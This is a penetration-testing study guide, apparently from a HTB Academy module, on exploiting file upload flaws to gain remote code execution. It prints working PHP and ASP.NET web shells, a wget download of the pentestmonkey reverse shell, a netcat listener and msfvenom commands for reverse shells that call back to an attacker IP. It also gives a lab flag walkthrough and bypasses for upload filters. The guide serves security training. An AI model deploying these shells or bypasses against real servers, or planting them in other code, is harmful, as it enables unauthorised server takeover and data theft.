Upload Exploitation
π― Core Technique: The final step in exploiting file upload vulnerabilities - deploying web shells and reverse shells for remote code execution
Overview
The final step in exploiting file upload vulnerabilities is to upload malicious scripts in the same language as the web application, such as web shells or reverse shell scripts. Once we upload our malicious script and visit its link, we can interact with it to take control over the back-end server.
Web Shells
π₯οΈ Interactive Control: Web-based command execution interfaces for compromised servers
Using Existing Web Shells
We can find many excellent web shells online that provide useful features, like directory traversal or file transfer. One good option for PHP is phpbash, which provides a terminal-like, semi-interactive web shell.
SecLists Web Shell Collection:
Location:
/opt/useful/seclists/Web-Shells/Languages: PHP, ASP, ASPX, JSP, Perl, Python
Features: Various functionality levels from basic to advanced
Deployment Process
Download appropriate web shell for target language (PHP, ASP.NET, etc.)
Upload through vulnerable upload feature
Navigate to uploaded file location
Interact with the web shell interface
Example phpbash deployment:
# Upload phpbash.php through vulnerable upload form
# Access via: http://SERVER_IP:PORT/uploads/phpbash.phpExpected output:
www-data@target:/var/www/html/uploads$ whoami
www-data
www-data@target:/var/www/html/uploads$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)Web Shell Advantages
Easy to use - Terminal-like interface
File management - Upload/download capabilities
Directory traversal - Navigate server filesystem
Command execution - Run system commands
Persistent access - Remains until removed
Writing Custom Web Shell
βοΈ Manual Creation: Building simple but effective web shells when online tools aren't available
PHP Web Shell
Basic PHP Web Shell:
<?php system($_REQUEST['cmd']); ?>Usage:
# Save as shell.php and upload
# Execute commands via: http://SERVER_IP:PORT/uploads/shell.php?cmd=idExample execution:
# URL: http://SERVER_IP:PORT/uploads/shell.php?cmd=id
# Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)Enhanced PHP Web Shell
Improved version with better formatting:
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>ASP.NET Web Shell
Basic .NET Web Shell:
<% eval request('cmd') %>Usage:
# Save as shell.aspx and upload
# Execute commands via: http://SERVER_IP:PORT/uploads/shell.aspx?cmd=whoamiViewing Output in Browser
π‘ Pro Tip: When using custom web shells in browsers, use source-view (Ctrl+U) to see command output as it would appear in terminal, without HTML rendering affecting the formatting.
Reverse Shell
π Direct Connection: Establish reverse connection back to attacker machine for full interactive shell
Using Existing Reverse Shell Scripts
Popular Reverse Shell Resources:
Pentestmonkey PHP Reverse Shell - Reliable and feature-rich
SecLists Reverse Shells - Multiple languages and frameworks
RevShells.com - Online reverse shell generator
Pentestmonkey PHP Reverse Shell Setup
Step 1: Download and Configure
# Download pentestmonkey PHP reverse shell
wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
# Edit configuration (lines 49-50)
$ip = '10.10.14.55'; // CHANGE THIS - Your IP
$port = 4444; // CHANGE THIS - Your listening portStep 2: Start Netcat Listener
nc -lvnp 4444Step 3: Upload and Execute
# Upload php-reverse-shell.php through vulnerable upload form
# Navigate to: http://SERVER_IP:PORT/uploads/php-reverse-shell.php
# Reverse shell connection establishedExpected Connection:
kabaneridev@htb[/htb]$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.55] from (UNKNOWN) [188.166.173.208] 35232
Linux target 4.15.0-72-generic #81-Ubuntu SMP Tue Nov 26 12:20:02 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
# id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
# whoami
www-dataReverse Shell Advantages
Full interactive shell - Complete terminal functionality
Better stability - More reliable than web shells
Direct connection - No need for web interface
File transfer capabilities - Easy upload/download
Tunneling possibilities - Can tunnel other tools
Generating Custom Reverse Shell Scripts
π οΈ Automated Creation: Using msfvenom to generate custom reverse shell payloads
msfvenom Reverse Shell Generation
PHP Reverse Shell:
msfvenom -p php/reverse_php LHOST=10.10.14.55 LPORT=4444 -f raw > reverse.phpJSP Reverse Shell:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.55 LPORT=4444 -f raw > reverse.jspASPX Reverse Shell:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.55 LPORT=4444 -f aspx > reverse.aspxWAR Reverse Shell (Tomcat):
msfvenom -p java/shell_reverse_tcp LHOST=10.10.14.55 LPORT=4444 -f war > reverse.warmsfvenom Advantages
Bypass restrictions - May evade certain security filters
Multiple formats - Various output formats available
Custom encoding - Built-in evasion techniques
Framework specific - Optimized for different web technologies
HTB Academy Lab Solution
Target Information
Target:
94.237.49.23:52640Objective: Upload web shell and retrieve
/flag.txtTechnique: File upload exploitation
Step-by-Step Solution
Step 1: Create Simple Web Shell
<?php system($_REQUEST['cmd']); ?>Step 2: Upload Web Shell
# Save as shell.php
# Upload through vulnerable upload form
# Note upload location (e.g., /uploads/)Step 3: Execute Commands
# Access: http://94.237.49.23:52640/uploads/shell.php?cmd=id
# Test command execution works
# Find flag: http://94.237.49.23:52640/uploads/shell.php?cmd=cat /flag.txtExpected Flag Format:
HTB{...}Alternative Approaches
If basic upload fails:
Try different extensions:
.phtml,.php3,.php4,.php5Modify Content-Type: Change to
image/jpegwhile keeping PHP contentAdd magic bytes: Prepend
GIF89ato PHP codeUse reverse shell: Deploy pentestmonkey or msfvenom payload
This comprehensive approach to upload exploitation provides the foundation for compromising web applications through file upload vulnerabilities, leading to full server compromise through web shells or reverse shells.
Last updated